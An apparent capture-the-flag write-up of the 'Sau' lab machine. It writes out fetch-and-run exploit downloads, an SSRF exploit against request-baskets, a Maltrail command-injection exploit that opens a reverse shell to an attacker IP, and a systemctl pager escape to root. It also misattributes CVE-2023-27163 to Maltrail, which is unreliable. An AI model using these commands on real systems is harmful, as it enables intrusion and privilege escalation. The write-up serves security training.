Information Gathering

Port Scan

nmap 10.10.11.224 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 18:30 WIB
Nmap scan report for 10.10.11.224
Host is up (0.027s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
55555/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds

Initial Access

80 port seem interesting but we got filtered. maybe some service running on 80 and only internal can access. web server runnig on port 55555, the web application is request-baskets we can idenfity in footer section

this version is vulnerable to CVE-2023-27163, this vulnerability name is SSR. next, we can see what is application on 80 running via this exploit. so we can perform exploit using this command

wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash CVE-2023-27163.sh http://10.10.11.224:55555 http://127.0.0.1:80

now, we can access http://10.10.11.224:55555/dtnfva

we can know from the footer section, Mailtrail running on 80. Powered by Maltrail (v0.53) is vulnerable to CVE-2023-27163. so let’s exploit this

wget https://github.com/spookier/Maltrail-v0.53-Exploit/raw/main/exploit.py
python3 exploit.py 10.10.14.2 1337 http://10.10.11.224:55555/dtnfva
Running exploit on http://10.10.11.224:55555/dtnfva/login

Privilege Escalation

let’s check the sudo

python3 -c "import pty;pty.spawn('/bin/bash')"
sudo -l
...
User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
...

we found that, let’s try the command

/usr/bin/systemctl status trail.service

at the bottom terminal is hanging, it’s like we run vim, we can quit via type q and hit enter. but we can also type !sh to get root access